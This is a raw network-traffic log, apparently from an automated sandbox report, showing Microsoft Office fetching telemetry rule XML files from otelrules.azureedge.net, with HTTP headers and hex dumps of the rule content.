                                                                                                                                      2024-10-07 01:23:04 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      42192.168.2.44977713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:04 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:04 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 479
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                                      x-ms-request-id: b2c548d6-d01e-0082-4f03-17e489000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012304Z-1657d5bbd48q6t9vvmrkd293mg00000002s000000000dsqa
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:04 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      43192.168.2.44977913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:04 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:04 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 475
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                                      x-ms-request-id: c5dbf9be-001e-0017-2cf1-160c3c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012304Z-1657d5bbd48xlwdx82gahegw40000000030g000000008x5f
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:04 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      44192.168.2.44977813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:04 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:04 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 425
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                                      x-ms-request-id: 678daa67-201e-00aa-3f60-173928000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012304Z-1657d5bbd48tqvfc1ysmtbdrg000000002q0000000008e9z
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:04 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      45192.168.2.44978013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:04 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:04 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 448
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                                      x-ms-request-id: 5e879109-c01e-00a2-3e73-172327000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012304Z-1657d5bbd48762wn1qw4s5sd3000000002k000000000sqdw
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:04 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      46192.168.2.44978113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:04 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:04 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 491
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                                      x-ms-request-id: 721d8bd8-801e-002a-4f00-1731dc000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012304Z-1657d5bbd48q6t9vvmrkd293mg00000002t0000000009z0t
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:04 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      47192.168.2.44978213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:04 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:04 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 416
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                                      x-ms-request-id: cb78c1b2-201e-003f-2e04-176d94000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012304Z-1657d5bbd48qjg85buwfdynm5w00000002yg000000004m9b
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:04 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      48192.168.2.44978613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:05 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:05 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                                      x-ms-request-id: 1ed82642-401e-0048-7b12-170409000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012305Z-1657d5bbd48qjg85buwfdynm5w00000002y0000000005wkd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      49192.168.2.44978313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:05 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:05 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                      x-ms-request-id: 04801829-801e-00ac-6301-17fd65000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012305Z-1657d5bbd48cpbzgkvtewk0wu000000002x0000000008s1v
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:05 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      50192.168.2.44978513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:05 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:05 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 479
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                                      x-ms-request-id: 27b6de9f-001e-0046-1e00-17da4b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012305Z-1657d5bbd48sqtlf1huhzuwq7000000002m0000000003vx2
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:05 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      51192.168.2.44978413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:05 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:05 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 471
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                                      x-ms-request-id: 2f3972b1-401e-0035-1b02-1782d8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012305Z-1657d5bbd48xdq5dkwwugdpzr0000000030g00000000qn27
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
